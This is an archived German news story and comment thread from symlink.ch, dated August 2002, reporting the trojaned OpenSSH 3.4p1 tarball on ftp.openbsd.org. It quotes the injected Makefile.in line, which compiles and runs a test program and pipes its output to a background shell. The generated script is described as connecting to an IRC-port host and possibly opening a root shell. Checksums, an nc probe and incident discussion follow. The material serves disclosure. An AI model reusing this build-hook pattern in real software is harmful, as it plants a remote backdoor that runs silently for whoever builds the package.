symlink.ch
Wissen Vernetzt - deutsche News für die Welt
 
symlink.ch
FAQ
Mission
Über uns
Richtlinien
Moderation
Einstellungen
Story einsenden
Suchen & Index
Ruhmeshalle
Statistiken
Umfragen
Redaktion
Themen
Partner
Planet
XML | RDF | RSS
PDA | WAP | IRC
Symbar für Opera
Symbar für Mozilla

Freunde
Benutzergruppen
LUG Switzerland
LUG Vorarlberg
LUGen in DE
SIUG
CCCZH
Organisationen
Wilhelm Tux
FSF Europe
Events
LinuxDay Dornbirn
BBA Schweiz
CoSin in Bremgarten AG
VCFe in München
Menschen
maol
Flupp
Ventilator
dawn
gumbo
krümelmonster
XTaran
maradong
tuxedo

 
Trojaner im OpenSSH Tar-Ball auf OpenBSD.org und evtl. alle Mirrors
Veröffentlicht durch Ventilator am Donnerstag 01. August, 11:42
Aus der Schaf-im-Wolfspelz Abteilung
Security XTaran schreibt "Ich wurde grade per IRC auf diesen Link aufmerksam gemacht:" (Siehe unten.) 

"Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz 
The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c 
[2] http://www.mavetju.org/~edwin/bf-output.sh 
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8


This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin"

1. August 2002 | Druckausgabe | US-Sicherheitsberater: Hacken ist gut  >

 

 
symlink.ch Login
Login:

Passwort:

extrahierte Links
  • OpenBSD
  • ftp://ftp.openbsd.org/pub/Open BSD/OpenSSH/portable/openssh-3 .4p1.tar.gz
  • http://www.mavetju.org/~edwin/ bf-test.c
  • http://www.mavetju.org/~edwin/ bf-output.sh
  • XTaran
  • diesen Link
  • Mehr zu Security
  • Auch von Ventilator
    •

    Diese Diskussion wurde archiviert. Es können keine neuen Kommentare abgegeben werden.
    OpenBSD.org OpenSSH.org, welches ist das Original? (Score:1)
    Von maol (maol.symlink.ch) am Thursday 01. August, 12:06 MES (#1)
    (User #1 Info) http://www.maol.ch/
    Welcher der beiden Server hat die Original Quellen, welcher ist nur Mirror? Oder werden beide Domains ab derselben Disk bedient? Wär noch nett gewesen, wenn Edwin auch OpenSSH.org abgecheckt hätte.

    --
    Where do I find the Any Key?

    Re:OpenBSD.org OpenSSH.org, welches ist das Orig.? (Score:3, Informativ)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 13:18 MES (#4)
    (User #129 Info) http://abe.home.pages.de/

    Die Webserver der beiden Domains haben unterschiedliche, aber nicht weit entfernte IPs (129.128.5.196 und 129.128.5.191), könnten aber gut auf der gleichen Kiste laufen. ftp.OpenSSH.org gibt es nicht, die Original-Quellen liegen auf ftp.OpenBSD.org (ebenfalls 129.128.5.191).

    OpenSSL.org liegt dagegen woanders: ftp = 129.132.7.170, www = 129.132.7.153.


    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Gestern gab's noch unverseuchte SSH auf Mirror (Score:2)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 12:26 MES (#2)
    (User #129 Info) http://abe.home.pages.de/

    Also wenn man den genannten md5sums trauen darf, dann war gestern unter ftp://pandemonium.tiscali.de/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz noch eine OpenSSH ohne diesen Trojaner. Hab allerdings nicht getestet, ob sie's immer noch ist.

    Klingt so, als wäre der Trojaner erst vor kurzem eingeschleust worden.


    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Re:Gestern gab's noch unverseuchte SSH auf Mirror (Score:0)
    Von Anonymer Feigling am Thursday 01. August, 13:07 MES (#3)
    459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz

    ..ist wohl okay
    Slashdot und Heise dazu (Score:2)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 14:43 MES (#5)
    (User #129 Info) http://abe.home.pages.de/
    Slashdot ; ; hat die Story jetzt auch. Einer der Submittors behauptet "eine Verbindung nach 203.62.158.32:6667 aufzumachen, wäre ja noch kein Trojaner", aber wenn das Programm dann von der Verbindung liest und den gelesenen Code von einer /bin/sh ausführen läß, dann nenne ich das sehr wohl einen Trojaner. Allerdings gibt es auf der anderen Seite zur Zeit nur ein Connection Refused:

    > nc -v 203.62.158.32 6667
    snsonline.net [203.62.158.32] 6667 (ircd) : Connection refused

    Außerdem gibt's dort noch einen Verweis auf das WebLog des Entdeckers.

    Heise hat's erst seit grade eben, obwohl bereits von dem AOL 8.0 Artikel aus der Readktion zu erfahren waren, daß sie dran seien.


    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Weblog (was: Slashdot und Heise dazu) (Score:1)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 14:51 MES (#6)
    (User #129 Info) http://abe.home.pages.de/
    Nur noch kurz die Info: Das oben verlinkte Weblog ist höchst interessant!
    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Re:Weblog (was: Slashdot und Heise dazu) (Score:2)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 14:55 MES (#7)
    (User #129 Info) http://abe.home.pages.de/
    Ok, das Weblog wurde geslashdottet und hat nun zurück geschlagen: Es liegt jetzt als Kommentar bei Slashdot. :-)
    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Angesprochener Server neu aufgesetzt (Score:2)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 15:41 MES (#10)
    (User #129 Info) http://abe.home.pages.de/
    Der Server, den das Skript konnektierte, wurde kurz nach Bekanntwerden des Zwischenfalls neu aufgesetzt. Es war allerding purer Zufall, daß der Entdecker im IRC auf den Besitzer jenes Rechner stieß und der nichts von dem Listener auf dem IRC-Port wußte. Siehe auch den passenden Slashdot-Kommentar.
    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    netscape (Score:0)
    Von Anonymer Feigling am Thursday 01. August, 14:57 MES (#8)
    Hi, was macht das script eigentlich ? Nen Proxy für den Navigator festlegen oder was ? Matthias
    Re:netscape (Score:1)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 15:36 MES (#9)
    (User #129 Info) http://abe.home.pages.de/
    Es oeffnet im Zweifelsfall eine root shell.
    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Schöne Analyse des Trojaners (Score:3, Informativ)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 17:19 MES (#11)
    (User #129 Info) http://abe.home.pages.de/
    Eine schöne Analyse des Trojaners -äh- Griechen ;-) findet sich auf BuqTraq.

    Interessant ist auch, daß der Entdecker eine Mail an incidents@securityfocus.com schrieb, diese aber noch nicht in den Archiven der Liste auftauchte, während Leute den Forward auf die FreeBSD-Security-Liste dann auf BuqTraq geforwardet haben und diese bereits im Archiv sind.


    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Was wurde eigentlich genau geknackt? (Score:1)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 19:08 MES (#12)
    (User #129 Info) http://abe.home.pages.de/

    Im IRC schwirren Gerüchte (angeblich aus Rumänien) rum, es wäre nicht der FTP-Server (der ja bekanntlich gleich dem WWW-Server ist) geknackt, sondern ein Name-Server. Allerdings kann ich mir nicht vorstellen, daß Änderungen am DNS so schnell durchpropagieren. Und auch Netcraft zeigte keine Änderung der IP bei www.openbsd.org an. Un din der Zwischenzeit liegen zwar auf ftp.openbsd.org wieder Tar-Balls ohne Trojaner, aber auf den Webseiten von OpenSSH und OpenBSD steht immer noch nix.

    Hat irgendjemand mehr Infos zu den Name-Server-Gerüchten?


    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    OpenSSH.org hat sich gemeldet (Score:2)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 20:47 MES (#13)
    (User #129 Info) http://abe.home.pages.de/
    Auf OpenSSH.org findet man seit kurzem ein sehr knappes Advisory zum Trojaner, allerdings ohne jegliche Datumsangabe. Die Hauptseite zeigt im CVS-Tag die Änderungszeit 17:04. Wenn das GMT ist, haben sie über 10 Stunden gebraucht, um die User überhaupt erstmal zu informieren. Die Veröffentlichung war heute morgen um 6:55 GMT.


    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...
    Re: OpenSSH.org hat sich gemeldet (Score:1)
    Von XTaran (symlink at deuxchevaux dot org) am Thursday 01. August, 20:57 MES (#14)
    (User #129 Info) http://abe.home.pages.de/
    Und Raffzahn hat's parallel zu meinem Kommentar als Story gebracht.

    Followup-To: 02/08/01/1847202 :-)
    -- 
    Einer der Gnutella-Klone heißt Gnutoka, und ich frag mich, wann Gnusspli rauskommt...

    Linux User Group Schweiz
    Durchsuche symlink.ch:  

    Never be led astray onto the path of virtue.    		 trash.net

    Anfang | Story einsenden | ältere Features | alte Umfragen | FAQ | Autoren | Einstellungen